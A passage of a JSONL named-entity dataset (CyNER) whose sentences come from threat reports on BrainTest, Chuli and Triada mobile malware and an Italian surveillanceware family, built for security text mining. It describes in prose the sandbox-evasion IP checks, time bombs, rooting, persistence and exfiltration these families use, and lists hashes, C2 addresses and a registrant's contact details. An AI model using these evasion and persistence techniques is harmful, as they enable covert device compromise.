tool for mtk6592 and an additional exploit .", "spans": {"Vulnerability: CVE-2013-6282": [[81, 94]]}, "info": {"id": "cyner_valid_000476", "source": "cyner_valid"}} {"text": "mcpef.apk ( SHA256 : a8e7dfac00adf661d371ac52bddc03b543bd6b7aa41314b255e53d810931ceac ) : The malicious system application downloaded from server ( package name – com.android.music.helper ) .", "spans": {}, "info": {"id": "cyner_valid_000478", "source": "cyner_valid"}} {"text": "If brother.apk application is removed , mcpef.apk reinstalls brother.apk from assets .", "spans": {"System: brother.apk": [[3, 14], [61, 72]], "System: mcpef.apk": [[40, 49]]}, "info": {"id": "cyner_valid_000480", "source": "cyner_valid"}} {"text": "System application installed by mcpef.apk .", "spans": {}, "info": {"id": "cyner_valid_000482", "source": "cyner_valid"}} {"text": "This has the same functionality as mcpef.apk .", "spans": {}, "info": {"id": "cyner_valid_000483", "source": "cyner_valid"}} {"text": "In addition , it monitors to verify if com.android.music.helper package is removed .", "spans": {}, "info": {"id": "cyner_valid_000484", "source": "cyner_valid"}} {"text": "If mcpef.apk is removed , brother.apk reinstalls it from a META-INF/brother file boy , post.sh : The shell scripts used for application persistency .", "spans": {}, "info": {"id": "cyner_valid_000485", "source": "cyner_valid"}} {"text": "Application lifecycle Application Lifecycle Google Bouncer Bypass On start , the application checks if it is executed on one of the Google servers : IP ranges 209.85.128.0-209.85.255.255 , 216.58.192.0-216.58.223.255 , 173.194.0.0-173.194.255.255 , 74.125.0.0-74.125.255.255 or if it is executed on IP hosted domain that contains the following strings : “ google ” , ” android ” , ” 1e100 ” .", "spans": {"System: Google Bouncer": [[44, 58]], "System: android": [[369, 376]]}, "info": {"id": "cyner_valid_000486", "source": "cyner_valid"}} {"text": "If any of these conditions is true , the application does not 
continue to execute the malicious flow .", "spans": {}, "info": {"id": "cyner_valid_000487", "source": "cyner_valid"}} {"text": "This method is design to bypass the automatic Google Play protection mechanism called Bouncer .", "spans": {"System: Google Play": [[46, 57]], "System: Bouncer": [[86, 93]]}, "info": {"id": "cyner_valid_000488", "source": "cyner_valid"}} {"text": "Timebombs , Dynamic Code Loading and Reflection If Google Bouncer was not detected , the application starts a time bomb which initiates the malicious flow only after 20 seconds and will run every 2 hours .", "spans": {"System: Google Bouncer": [[51, 65]]}, "info": {"id": "cyner_valid_000489", "source": "cyner_valid"}} {"text": "Unpacker thread decrypt java archive from assets directory “ start.ogg ” , and dynamically loads it and calls the method “ a.a.a.b ” from this archive .", "spans": {}, "info": {"id": "cyner_valid_000491", "source": "cyner_valid"}} {"text": "This method checks if eight hours have passed from the first run of application , and if so , request containing the device ’ s data to the server .", "spans": {}, "info": {"id": "cyner_valid_000492", "source": "cyner_valid"}} {"text": "Then the application downloads java archive from the URL specified in json , dynamically loads it with class loader API .", "spans": {}, "info": {"id": "cyner_valid_000494", "source": "cyner_valid"}} {"text": "Once archive is loaded , the application uses reflection api to call methods from the class names specified in the json .", "spans": {}, "info": {"id": "cyner_valid_000495", "source": "cyner_valid"}} {"text": "Rooting and Ad Network Presentation The reflection loaded methods check if the device is rooted .", "spans": {}, "info": {"id": "cyner_valid_000496", "source": "cyner_valid"}} {"text": "If not , the application downloads a pack of exploits from the server and runs them one-by-one up until root is achieved .", "spans": {}, "info": {"id": "cyner_valid_000497", "source": "cyner_valid"}} 
{"text": "As root , the application copies su binary to /system/bin directory and silently downloads apk file from the server .", "spans": {}, "info": {"id": "cyner_valid_000498", "source": "cyner_valid"}} {"text": "Then , the APK is installed as system application and registers listener on USER_PRESENT event .", "spans": {}, "info": {"id": "cyner_valid_000499", "source": "cyner_valid"}} {"text": "This event triggers archive downloading thread .", "spans": {}, "info": {"id": "cyner_valid_000500", "source": "cyner_valid"}} {"text": "Once the event is triggered , it registers a timer .", "spans": {}, "info": {"id": "cyner_valid_000501", "source": "cyner_valid"}} {"text": "It downloads one more archive and dynamically loads code from it .", "spans": {}, "info": {"id": "cyner_valid_000504", "source": "cyner_valid"}} {"text": "The final APK is downloaded from a different URL that is currently down , we assume that the apk purpose is overlaying ads on the screen , we assume this based on the research we have done on the API we found which returns URL of random APK file containing different advertising networks .", "spans": {}, "info": {"id": "cyner_valid_000505", "source": "cyner_valid"}} {"text": "Persistency Watch-Dog The application contains protection against its own removal .", "spans": {}, "info": {"id": "cyner_valid_000506", "source": "cyner_valid"}} {"text": "As outlined in the diagram above , It installs an additional application with the same functionality and these two applications monitor the removal of each other .", "spans": {}, "info": {"id": "cyner_valid_000507", "source": "cyner_valid"}} {"text": "If one of the applications is deleted , the second application downloads and re-installs the removed one .", "spans": {}, "info": {"id": "cyner_valid_000508", "source": "cyner_valid"}} {"text": "Network activity BrainTest communicates with five servers : APK files provider ( http : //psserviceonline [ .", "spans": {}, "info": {"id": "cyner_valid_000509", 
"source": "cyner_valid"}} {"text": "] com/ ) : This server provides APK files with advertising network .", "spans": {}, "info": {"id": "cyner_valid_000510", "source": "cyner_valid"}} {"text": "We found two functions : The first function is http : //s.psserviceonline [ .", "spans": {}, "info": {"id": "cyner_valid_000511", "source": "cyner_valid"}} {"text": "] com/api/s2s/tracks/ and is used for activation .", "spans": {}, "info": {"id": "cyner_valid_000512", "source": "cyner_valid"}} {"text": "The second function is http : //s.psserviceonline [ .", "spans": {}, "info": {"id": "cyner_valid_000513", "source": "cyner_valid"}} {"text": "Regardless of the parameters , it returns a json containing a link for APK file .", "spans": {}, "info": {"id": "cyner_valid_000515", "source": "cyner_valid"}} {"text": "] com http : //www.adsuperiorstore [ .", "spans": {}, "info": {"id": "cyner_valid_000519", "source": "cyner_valid"}} {"text": "] com Counter Measures Use an up to date anti-malware software that is capable of identifying this threat .", "spans": {}, "info": {"id": "cyner_valid_000521", "source": "cyner_valid"}} {"text": "If the threat reappears on the device after the first installation , it means that the malware managed to install the persistency module in the System directory .", "spans": {}, "info": {"id": "cyner_valid_000522", "source": "cyner_valid"}} {"text": "In this case , the device should be re-flashed with an official ROM .", "spans": {}, "info": {"id": "cyner_valid_000523", "source": "cyner_valid"}} {"text": "As has been previously reported , some versions of the Android malware were present in the Google Play Store .", "spans": {"System: Android": [[55, 62]], "System: Google Play Store": [[91, 108]]}, "info": {"id": "cyner_valid_000525", "source": "cyner_valid"}} {"text": "The iOS versions were available outside the app store , through phishing sites , and abused the Apple Developer Enterprise program .", "spans": {"System: iOS": [[4, 7]], "System: app 
store": [[44, 53]], "Organization: Apple Developer Enterprise": [[96, 122]]}, "info": {"id": "cyner_valid_000526", "source": "cyner_valid"}} {"text": "Background : Android surveillanceware Early last year , Lookout discovered a sophisticated Android surveillanceware agent that appears to have been created for the lawful intercept market .", "spans": {"System: Android": [[13, 20], [91, 98]], "Organization: Lookout": [[56, 63]]}, "info": {"id": "cyner_valid_000527", "source": "cyner_valid"}} {"text": "The agent appears to have been under development for at least five years and consists of three stages .", "spans": {}, "info": {"id": "cyner_valid_000528", "source": "cyner_valid"}} {"text": "First , there is a small dropper , then a large second stage payload that contains multiple binaries ( where most of the surveillance functionality is implemented ) , and finally a third stage which typically uses the DirtyCOW exploit ( CVE-2016-5195 ) to obtain root .", "spans": {"Vulnerability: DirtyCOW exploit": [[218, 234]], "Vulnerability: CVE-2016-5195": [[237, 250]]}, "info": {"id": "cyner_valid_000529", "source": "cyner_valid"}} {"text": "Security Without Borders has recently published an analysis of this family , independently , through their blog .", "spans": {"Organization: Security Without Borders": [[0, 24]]}, "info": {"id": "cyner_valid_000530", "source": "cyner_valid"}} {"text": "These included the use of certificate pinning and public key encryption for C2 communications , geo-restrictions imposed by the C2 when delivering the second stage , and the comprehensive and well implemented suite of surveillance features .", "spans": {}, "info": {"id": "cyner_valid_000532", "source": "cyner_valid"}} {"text": "Early versions of the Android application used infrastructure which belonged to a company named Connexxa S.R.L .", "spans": {"System: Android": [[22, 29]], "Organization: Connexxa S.R.L .": [[96, 112]]}, "info": {"id": "cyner_valid_000533", "source": "cyner_valid"}} 
{"text": "and were signed using the name of an engineer who appears to hold equity in Connexxa .", "spans": {"Organization: Connexxa": [[76, 84]]}, "info": {"id": "cyner_valid_000534", "source": "cyner_valid"}} {"text": "This engineer ’ s name is also associated with a company called eSurv S.R.L .", "spans": {"Organization: eSurv S.R.L .": [[64, 77]]}, "info": {"id": "cyner_valid_000535", "source": "cyner_valid"}} {"text": "eSurv ’ s public marketing is centered around video surveillance software and image recognition systems , but there are a number of individuals claiming to be mobile security researchers working at the company , including one who has publically made claims to be developing a mobile surveillance agent .", "spans": {"Organization: eSurv": [[0, 5]]}, "info": {"id": "cyner_valid_000536", "source": "cyner_valid"}} {"text": "Moreover , eSurv was a business unit of Connexxa and was leased to eSurv S.R.L in 2014 .", "spans": {"Organization: eSurv": [[11, 16]], "Organization: Connexxa": [[40, 48]], "Organization: eSurv S.R.L": [[67, 78]]}, "info": {"id": "cyner_valid_000537", "source": "cyner_valid"}} {"text": "Lookout notified Google of the potential threat shortly after it was discovered .", "spans": {"Organization: Lookout": [[0, 7]], "Organization: Google": [[17, 23]]}, "info": {"id": "cyner_valid_000541", "source": "cyner_valid"}} {"text": "iOS development Analysis of these Android samples led to the discovery of infrastructure that contained several samples of an iOS port .", "spans": {"System: iOS": [[0, 3], [126, 129]], "System: Android": [[34, 41]]}, "info": {"id": "cyner_valid_000543", "source": "cyner_valid"}} {"text": "So far , this software ( along with the Android version ) has been made available through phishing sites that imitated Italian and Turkmenistani mobile carriers .", "spans": {"System: Android": [[40, 47]]}, "info": {"id": "cyner_valid_000544", "source": "cyner_valid"}} {"text": "The Apple Developer Enterprise program is 
intended to allow organizations to distribute proprietary , in-house apps to their employees without needing to use the iOS App Store .", "spans": {"Organization: Apple Developer Enterprise": [[4, 30]], "System: iOS": [[162, 165]], "System: App Store": [[166, 175]]}, "info": {"id": "cyner_valid_000546", "source": "cyner_valid"}} {"text": "A business can obtain access to this program only provided they meet requirements set out by Apple .", "spans": {"Organization: Apple": [[93, 98]]}, "info": {"id": "cyner_valid_000547", "source": "cyner_valid"}} {"text": "It is not common to use this program to distribute malware , although there have been past cases where malware authors have done so .", "spans": {}, "info": {"id": "cyner_valid_000548", "source": "cyner_valid"}} {"text": "Each of the phishing sites contained links to a distribution manifest , which contained metadata such as the application name , version , icon , and a URL for the IPA file .", "spans": {}, "info": {"id": "cyner_valid_000549", "source": "cyner_valid"}} {"text": "To be distributed outside the app store , an IPA package must contain a mobile provisioning profile with an enterprise ’ s certificate .", "spans": {}, "info": {"id": "cyner_valid_000550", "source": "cyner_valid"}} {"text": "All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L .", "spans": {"Organization: Connexxa S.R.L .": [[105, 121]]}, "info": {"id": "cyner_valid_000551", "source": "cyner_valid"}} {"text": "One of the packages after initial launch The iOS variant is not as sophisticated as the Android version , and contained a subset of the functionality the Android releases offered .", "spans": {"System: iOS": [[45, 48]], "System: Android": [[88, 95], [154, 161]]}, "info": {"id": "cyner_valid_000553", "source": "cyner_valid"}} {"text": "In particular , these packages have not been observed to contain or to download exploits which would be required to perform certain 
types of activities on iOS devices .", "spans": {"System: iOS": [[155, 158]]}, "info": {"id": "cyner_valid_000554", "source": "cyner_valid"}} {"text": "Even without capabilities to exploit a device , the packages were able to exfiltrate the following types of data using documented APIs : Contacts Audio recordings Photos Videos GPS location Device information In addition , the packages offered a feature to perform remote audio recording .", "spans": {"System: GPS": [[177, 180]]}, "info": {"id": "cyner_valid_000555", "source": "cyner_valid"}} {"text": "Though different versions of the app vary in structure , malicious code was initialized at application launch without the user ’ s knowledge , and a number of timers were setup to gather and upload data periodically .", "spans": {}, "info": {"id": "cyner_valid_000556", "source": "cyner_valid"}} {"text": "Upload data was queued and transmitted via HTTP PUT requests to an endpoint on the C2 .", "spans": {}, "info": {"id": "cyner_valid_000557", "source": "cyner_valid"}} {"text": "The iOS apps leverage the same C2 infrastructure as the Android version and use similar communications protocols .", "spans": {"System: iOS": [[4, 7]], "System: Android": [[56, 63]]}, "info": {"id": "cyner_valid_000558", "source": "cyner_valid"}} {"text": "Push notifications were also used to control audio recording .", "spans": {}, "info": {"id": "cyner_valid_000559", "source": "cyner_valid"}} {"text": "Lookout has shared information about this family with Apple , and they have revoked the affected certificates .", "spans": {"Organization: Lookout": [[0, 7]], "Organization: Apple": [[54, 59]]}, "info": {"id": "cyner_valid_000560", "source": "cyner_valid"}} {"text": "As a result , no new instances of this app can be installed on iOS devices and existing installations can no longer be run .", "spans": {"System: iOS": [[63, 66]]}, "info": {"id": "cyner_valid_000561", "source": "cyner_valid"}} {"text": "Lookout customers are also protected from this 
threat on both Android and iOS .", "spans": {"Organization: Lookout": [[0, 7]], "System: Android": [[62, 69]], "System: iOS": [[74, 77]]}, "info": {"id": "cyner_valid_000562", "source": "cyner_valid"}} {"text": "Android Trojan Found in Targeted Attack 26 MAR 2013 In the past , we ’ ve seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms .", "spans": {"System: Android": [[0, 7]], "System: Windows": [[136, 143]], "System: Mac OS X": [[148, 156]]}, "info": {"id": "cyner_valid_000563", "source": "cyner_valid"}} {"text": "We ’ ve documented several interesting attacks ( A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify ) which used ZIP files as well as DOC , XLS and PDF documents rigged with exploits .", "spans": {"System: Mac OS X": [[114, 122]]}, "info": {"id": "cyner_valid_000564", "source": "cyner_valid"}} {"text": "Several days ago , the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates .", "spans": {}, "info": {"id": "cyner_valid_000565", "source": "cyner_valid"}} {"text": "Perhaps the most interesting part is that the attack e-mails had an APK attachment – a malicious program for Android .", "spans": {"System: Android": [[109, 116]]}, "info": {"id": "cyner_valid_000566", "source": "cyner_valid"}} {"text": "The attack On March 24th , 2013 , the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list .", "spans": {}, "info": {"id": "cyner_valid_000567", "source": "cyner_valid"}} {"text": "This is what the spear phishing e-mail looked like : In regards to the message text above , multiple activist groups have recently organized a human rights conference event in Geneva .", "spans": {}, "info": {"id": "cyner_valid_000568", "source": "cyner_valid"}} {"text": "We ’ ve noticed an increase in the number of attacks using this event as a 
lure .", "spans": {}, "info": {"id": "cyner_valid_000569", "source": "cyner_valid"}} {"text": "Here ’ s another example of such an attack hitting Windows users : Going back to the Android Package ( APK ) file was attached to the e-mail , this is pushing an Android application named “ WUC ’ s Conference.apk ” .", "spans": {"System: Windows": [[51, 58]], "System: Android Package": [[85, 100]], "Malware: WUC ’ s Conference.apk": [[190, 212]]}, "info": {"id": "cyner_valid_000570", "source": "cyner_valid"}} {"text": "This malicious APK is 334326 bytes file , MD5 : 0b8806b38b52bebfe39ff585639e2ea2 and is detected by Kaspersky Lab products as “ Backdoor.AndroidOS.Chuli.a ” .", "spans": {"Organization: Kaspersky Lab": [[100, 113]]}, "info": {"id": "cyner_valid_000571", "source": "cyner_valid"}} {"text": "After the installation , an application named “ Conference ” appears on the desktop : If the victim launches this app , he will see text which “ enlightens ” the information about the upcoming event : The full text reads follows .", "spans": {}, "info": {"id": "cyner_valid_000572", "source": "cyner_valid"}} {"text": "Notice notice the use of the mistaken “ Word ” instead of “ World ” : “ On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled", "spans": {"Organization: Word Uyghur Congress ( WUC )": [[96, 124]], "Organization: Unrepresented Nations and Peoples Organization ( UNPO )": [[131, 186]], "Organization: Society for Threatened Peoples ( STP )": [[195, 233]]}, "info": {"id": "cyner_valid_000573", "source": "cyner_valid"}} {"text": "by the great enthusiasm , contribution and desire from all in 
attendance to make this occasion something meaningful , the outcome of which produced some concrete , action-orientated solutions to our shared grievances .", "spans": {}, "info": {"id": "cyner_valid_000574", "source": "cyner_valid"}} {"text": "Dolkun lsa Chairman of the Executive Committee Word Uyghur Congress ” While the victim reads this fake message , the malware secretly reports the infection to a command-and-control server .", "spans": {"Organization: Executive Committee Word Uyghur Congress": [[27, 67]]}, "info": {"id": "cyner_valid_000577", "source": "cyner_valid"}} {"text": "After that , it begins to harvest information stored on the device .", "spans": {}, "info": {"id": "cyner_valid_000578", "source": "cyner_valid"}} {"text": "The stolen data includes : Contacts ( stored both on the phone and the SIM card ) .", "spans": {}, "info": {"id": "cyner_valid_000579", "source": "cyner_valid"}} {"text": "Phone data ( phone number , OS version , phone model , SDK version ) .", "spans": {}, "info": {"id": "cyner_valid_000583", "source": "cyner_valid"}} {"text": "It is important to note that the data won ’ t be uploaded to C & C server automatically .", "spans": {}, "info": {"id": "cyner_valid_000584", "source": "cyner_valid"}} {"text": "The Trojan waits for incoming SMS messages ( the “ alarmReceiver.class ” ) and checks whether these messages contain one of the following commands : “ sms ” , “ contact ” , “ location ” , “ other ” .", "spans": {}, "info": {"id": "cyner_valid_000585", "source": "cyner_valid"}} {"text": "The C2 URL is : hxxp : //64.78.161.133/ * victims ’ s_cell_phone_number * /process.php In addition to this , the malware also reports to another script , “ hxxp : //64.78.161.33/android.php ” .", "spans": {}, "info": {"id": "cyner_valid_000587", "source": "cyner_valid"}} {"text": "First , it will get the “ nativenumber ” variable from the “ telmark ” value of “ AndroidManifest.xml ” .", "spans": {"System: AndroidManifest.xml": [[82, 101]]}, "info": 
{"id": "cyner_valid_000588", "source": "cyner_valid"}} {"text": "Then , it will add the result of the public method localDate.getTime ( ) , which simply gets the current date .", "spans": {}, "info": {"id": "cyner_valid_000590", "source": "cyner_valid"}} {"text": "An example of the string which is sent to the command-and-control would be “ phone 26.03.2013 ” .", "spans": {}, "info": {"id": "cyner_valid_000591", "source": "cyner_valid"}} {"text": "It is interesting that the attackers used Java Base64 library developed by Sauron Software .", "spans": {"Organization: Sauron Software": [[75, 90]]}, "info": {"id": "cyner_valid_000592", "source": "cyner_valid"}} {"text": "This software is free and distributed under LGPL license .", "spans": {}, "info": {"id": "cyner_valid_000593", "source": "cyner_valid"}} {"text": "Also , command communications with the malware are parsed with a function named “ chuli ( ) ” prior to POSTing stolen data to the command-and-control server .", "spans": {}, "info": {"id": "cyner_valid_000594", "source": "cyner_valid"}} {"text": "It appears that the attackers are somewhat familiar with the language and mountain-trekking culture of the targets – the meaning of “ chuli ” is “ summit ” : The command-and-control server and parameters can be easily seen in the decompiled source code : Command and control server interaction code Throughout the code , the attackers log all important actions , which include various messages in Chinese .", "spans": {}, "info": {"id": "cyner_valid_000595", "source": "cyner_valid"}} {"text": "This was probably done for debugging purposes , indicating the malware may be an early prototype version .", "spans": {}, "info": {"id": "cyner_valid_000596", "source": "cyner_valid"}} {"text": "This IP is located in Los Angeles , U.S.A. 
, at a hosting company named “ Emagine Concept Inc ” .", "spans": {"Organization: Emagine Concept Inc": [[74, 93]]}, "info": {"id": "cyner_valid_000598", "source": "cyner_valid"}} {"text": "Interestingly , there is a domain which used to point there , “ DlmDocumentsExchange.com ” .", "spans": {}, "info": {"id": "cyner_valid_000599", "source": "cyner_valid"}} {"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000", "spans": {"Organization: SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD.": [[83, 146]]}, "info": {"id": "cyner_valid_000600", "source": "cyner_valid"}} {"text": "+86.01078456689 Fax .", "spans": {}, "info": {"id": "cyner_valid_000602", "source": "cyner_valid"}} {"text": "+86.01078456689 The command-and-control server is hosting an index page which also serves an APK file : The referenced “ Document.apk ” is 333583 bytes in size , MD5 : c4c4077e9449147d754afd972e247efc .", "spans": {}, "info": {"id": "cyner_valid_000603", "source": "cyner_valid"}} {"text": "It has the same functionality as the one described above but contains different text .", "spans": {}, "info": {"id": "cyner_valid_000604", "source": "cyner_valid"}} {"text": "The new text ( in Chinese , about relations between China , Japan and the disputed “ Senkaku Islands / Diaoyudao Islands / Diaoyutai Islands ” ) is shown to the victims and reads as following : When opened in a browser , this is what the command-and-control index page looks like : The text on the top means “ Title Title Title ” in Chinese , while the other strings appear to be random characters typed from the 
keyboard .", "spans": {}, "info": {"id": "cyner_valid_000605", "source": "cyner_valid"}} {"text": "Interestingly , the command and control server includes a publicly accessible interface to work with the victims : Some of the commands with rough translations : The command-and-control server is running Windows Server 2003 and has been configured for Chinese language : This , together with the logs , is a strong indicator that the attackers are Chinese-speaking .", "spans": {"System: Windows Server": [[204, 218]]}, "info": {"id": "cyner_valid_000606", "source": "cyner_valid"}} {"text": "Conclusions Every day , there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters .", "spans": {}, "info": {"id": "cyner_valid_000607", "source": "cyner_valid"}} {"text": "The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158 , CVE-2010-3333 and CVE-2009-3129 .", "spans": {"System: Windows": [[34, 41]], "System: Word": [[59, 63]], "Vulnerability: CVE-2012-0158": [[115, 128]], "Vulnerability: CVE-2010-3333": [[131, 144]], "Vulnerability: CVE-2009-3129": [[149, 162]]}, "info": {"id": "cyner_valid_000608", "source": "cyner_valid"}} {"text": "In this case , the attackers hacked a Tibetan activist ’ s account and used it to attack Uyghur activists .", "spans": {}, "info": {"id": "cyner_valid_000609", "source": "cyner_valid"}} {"text": "It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities .", "spans": {}, "info": {"id": "cyner_valid_000610", "source": "cyner_valid"}} {"text": "This technique reminds us of a combination between ages old war strategies “ Divide et impera ” and “ By way of deception ” .", "spans": {}, "info": {"id": "cyner_valid_000611", "source": "cyner_valid"}} {"text": "Until now , we haven ’ t seen targeted attacks against mobile phones , although we ’ ve seen indications that these were in development 
.", "spans": {}, "info": {"id": "cyner_valid_000612", "source": "cyner_valid"}} {"text": "The current attack took advantage of the compromise of a high-profile Tibetan activist .", "spans": {}, "info": {"id": "cyner_valid_000613", "source": "cyner_valid"}} {"text": "So far , the attackers relied entirely on social engineering to infect the targets .", "spans": {}, "info": {"id": "cyner_valid_000615", "source": "cyner_valid"}} {"text": "History has shown us that , in time , these attacks will use zero-day vulnerabilities , exploits or a combination of techniques .", "spans": {"Vulnerability: zero-day vulnerabilities": [[61, 85]]}, "info": {"id": "cyner_valid_000616", "source": "cyner_valid"}} {"text": "For now , the best protection is to avoid any APK attachments that arrive on mobile phones via e-mail .", "spans": {}, "info": {"id": "cyner_valid_000617", "source": "cyner_valid"}} {"text": "We detect the malware used in this attack as “ Backdoor.AndroidOS.Chuli.a ” .", "spans": {"Malware: Backdoor.AndroidOS.Chuli.a": [[47, 73]]}, "info": {"id": "cyner_valid_000618", "source": "cyner_valid"}} {"text": "MD5s : c4c4077e9449147d754afd972e247efc Document.apk 0b8806b38b52bebfe39ff585639e2ea2 WUC ’ s Conference.apk Triada : organized crime on Android Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and uses several clever methods to become almost invisible March 3 , 2016 You know how armies typically move : first come the scouts to make sure everything is ok. 
Then the heavy troops", "spans": {"Malware: Triada": [[109, 115], [145, 151]], "System: Android": [[137, 144]]}, "info": {"id": "cyner_valid_000619", "source": "cyner_valid"}} {"text": "arrive ; at least that was how it used to be before the age of cyber wars .", "spans": {}, "info": {"id": "cyner_valid_000620", "source": "cyner_valid"}} {"text": "It turns out , that Trojans behave quite the same way .", "spans": {}, "info": {"id": "cyner_valid_000621", "source": "cyner_valid"}} {"text": "There are a lot of small Trojans for Android capable of leveraging access privileges , in other words — gaining root access .", "spans": {"System: Android": [[37, 44]]}, "info": {"id": "cyner_valid_000622", "source": "cyner_valid"}} {"text": "Our malware analysts Nikita Buchka and Mikhail Kuzin can easily name 11 families of such Trojans .", "spans": {}, "info": {"id": "cyner_valid_000623", "source": "cyner_valid"}} {"text": "Most of them are almost harmless — all they did until recently was injecting tons of ads and downloading others of their kind .", "spans": {}, "info": {"id": "cyner_valid_000624", "source": "cyner_valid"}} {"text": "If you want to know more about them — our researchers have an article about them on Securelist .", "spans": {"Organization: Securelist": [[84, 94]]}, "info": {"id": "cyner_valid_000625", "source": "cyner_valid"}} {"text": "If you follow the military analogy — those are the scouts .", "spans": {}, "info": {"id": "cyner_valid_000626", "source": "cyner_valid"}} {"text": "As you probably have noticed , gaining root access gives them the capability to download and install applications — that ’ s the reason why once one of them get into the system , in a few minutes there are all the others .", "spans": {}, "info": {"id": "cyner_valid_000627", "source": "cyner_valid"}} {"text": "But our researchers have predicted that these small Trojans would certainly be used to download some really bad malware that can actually harm the owners of the infected devices 
.", "spans": {}, "info": {"id": "cyner_valid_000628", "source": "cyner_valid"}} {"text": "And that ’ s exactly what has happened recently .", "spans": {}, "info": {"id": "cyner_valid_000629", "source": "cyner_valid"}} {"text": "Small Trojans like Leech , Ztorg and Gopro now download one of the most advanced mobile Trojans our malware analysts have ever encountered — we call it Triada .", "spans": {"Malware: Leech": [[19, 24]], "Malware: Ztorg": [[27, 32]], "Malware: Gopro": [[37, 42]], "Malware: Triada": [[152, 158]]}, "info": {"id": "cyner_valid_000630", "source": "cyner_valid"}} {"text": "The dark ways of the Triada Once downloaded and installed , the Triada Trojan first tries to collect some information about the system — like the device model , the OS version , the amount of the SD card space , the list of the installed applications and other things .", "spans": {"Malware: Triada": [[21, 27], [64, 70]]}, "info": {"id": "cyner_valid_000632", "source": "cyner_valid"}} {"text": "Then it sends all that information to the Command & Control server .", "spans": {}, "info": {"id": "cyner_valid_000633", "source": "cyner_valid"}} {"text": "We have detected a total of 17 C & C servers on 4 different domains , which probably means the bad guys are quite familiar with what redundancy is .", "spans": {}, "info": {"id": "cyner_valid_000634", "source": "cyner_valid"}} {"text": "After the modules are installed they are deployed to the short term memory and deleted from the device storage , which makes the Trojan a lot harder to catch .", "spans": {}, "info": {"id": "cyner_valid_000636", "source": "cyner_valid"}} {"text": "There are two more reasons why Triada is so hard to detect and why it had impressed our researchers so much .", "spans": {"Malware: Triada": [[31, 37]]}, "info": {"id": "cyner_valid_000637", "source": "cyner_valid"}} {"text": "First , it modifies the Zygote process .", "spans": {"System: Zygote": [[24, 30]]}, "info": {"id": "cyner_valid_000638", "source": 
"cyner_valid"}} {"text": "Triada : organized crime on Android Second , it substitutes the system functions and conceals its modules from the list of the running processes and installed apps .", "spans": {"Malware: Triada": [[0, 6]], "System: Android": [[28, 35]]}, "info": {"id": "cyner_valid_000640", "source": "cyner_valid"}} {"text": "So the system doesn ’ t see any strange processes running and thus does not cry the alarm .", "spans": {}, "info": {"id": "cyner_valid_000641", "source": "cyner_valid"}} {"text": "Those are not the only system functions Triada modifies .", "spans": {"Malware: Triada": [[40, 46]]}, "info": {"id": "cyner_valid_000642", "source": "cyner_valid"}} {"text": "That is actually how the bad guys decided to monetize the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000644", "source": "cyner_valid"}} {"text": "Some applications rely on SMS when it comes to in-app purchases — the transaction data is transferred via a short text message .", "spans": {}, "info": {"id": "cyner_valid_000645", "source": "cyner_valid"}} {"text": "Users do not see those SMS because they are processed not by the SMS app , but by the app that has initiated the transaction — e.g a free-to-play game .", "spans": {}, "info": {"id": "cyner_valid_000647", "source": "cyner_valid"}} {"text": "Triada ’ s functionality allows it to modify those messages , so the money is sent not to some app developer , but to the malware operators .", "spans": {"Malware: Triada": [[0, 6]]}, "info": {"id": "cyner_valid_000648", "source": "cyner_valid"}} {"text": "Triada steals the money either from the users — if they haven ’ t succeeded in purchasing whatever they wanted , or from the app developers , in case the user has completed the purchase successfully .", "spans": {"Malware: Triada": [[0, 6]]}, "info": {"id": "cyner_valid_000649", "source": "cyner_valid"}} {"text": "For now , that is the only way how cybercriminals can profit from Triada , but don ’ t forget that it ’ s a modular 
Trojan , so it can be turned into literally everything on one command from the C & C server .", "spans": {"Malware: Triada": [[66, 72]]}, "info": {"id": "cyner_valid_000650", "source": "cyner_valid"}} {"text": "Fighting organized crime in your phone One of the main problems with Triada is that it can potentially hurt a LOT of people .", "spans": {"Malware: Triada": [[69, 75]]}, "info": {"id": "cyner_valid_000651", "source": "cyner_valid"}} {"text": "As we ’ ve mentioned earlier , Triada is downloaded by smaller Trojans that have leveraged the access privileges .", "spans": {"Malware: Triada": [[31, 37]]}, "info": {"id": "cyner_valid_000652", "source": "cyner_valid"}} {"text": "And our researchers estimate that in every 10 Android users 1 was attacked by either one or several of those Trojans during the second half of 2015 , so there are millions of devices with a huge possibility of being infected with Triada .", "spans": {"System: Android": [[46, 53]], "Malware: Triada": [[230, 236]]}, "info": {"id": "cyner_valid_000653", "source": "cyner_valid"}} {"text": "So , what can you do to protect yourself from this stealthy beast ?", "spans": {}, "info": {"id": "cyner_valid_000654", "source": "cyner_valid"}} {"text": "Never forget to update your system .", "spans": {}, "info": {"id": "cyner_valid_000656", "source": "cyner_valid"}} {"text": "It turns out that those smaller Trojans face serious problems trying to get root access on Android 4.4.4 and above , because a lot of vulnerabilities were patched in these versions .", "spans": {"System: Android 4.4.4": [[91, 104]]}, "info": {"id": "cyner_valid_000657", "source": "cyner_valid"}} {"text": "So if you have Android 4.4.4 or some more recent version of this OS on your device , your chances of getting infected with Triada are significantly lower .", "spans": {"System: Android 4.4.4": [[15, 28]], "Malware: Triada": [[123, 129]]}, "info": {"id": "cyner_valid_000658", "source": "cyner_valid"}} {"text": "Yet our statistics says 
